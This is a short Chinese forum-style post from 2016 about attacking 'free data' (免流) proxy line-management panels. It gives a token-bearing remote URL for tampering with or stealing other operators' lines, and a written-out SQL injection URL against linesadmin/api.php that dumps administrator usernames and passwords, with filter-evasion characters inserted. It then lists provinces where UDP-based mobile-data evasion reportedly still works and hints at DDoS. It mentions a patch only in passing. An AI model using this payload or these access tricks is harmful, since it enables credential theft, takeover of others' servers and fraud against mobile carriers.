2,把线路配置里面的冕旒代码稍稍的修改一两个,变成不免的
看版本还可用代码http://服务器IP/sbwremote/smhoud.php?token=sbwml.cn
http://服务器IP:8888/sbwremote/smhoud.php?token=sbwml.cn
直接删除线路偷线路都行软件的app的地址都可以修改
adminer 可注入式后台 PHP admin页面有SQL注入
漏洞详情:http://ip:端口/linesadmin/api.php?c=user&a=find&device_ids=1) or和谐 1 uni和谐on all sele和谐ct username,password,3,4,5,6,7,8,9,0 from admin%23
这个可以获取到管理员账号密码,稍做修改可以获取数据库中的所有数据
修复方法,把linesadmin修复.zip解压替换到linesadmin文件夹中
个人的能力有限,这个方法,可以抵御一些小白的攻击。
今天在QQ群里面见人家讨论了好久这个玩意儿,
最后我总结了一下现在还能免流的地区有:
四川 成都 广西 云南 上海 山西
贵州 山东 广东 江西 海南 湖北
浙江 湖南 天津 黑龙江 重庆 河北
福建 甘肃 河南 安徽 陕西
至于其他的地区未测试,不在上述地区之列的小伙伴可以自己试着能不能免流。
最后,上述地区确实能免流,但是具有时效性,不代表100%有效!
免流地区只针对于现在流行的UDP免流方式,通常端口有137/138
ddos最直接..你懂的
更多漏洞 敬请待关注更新2016/11/13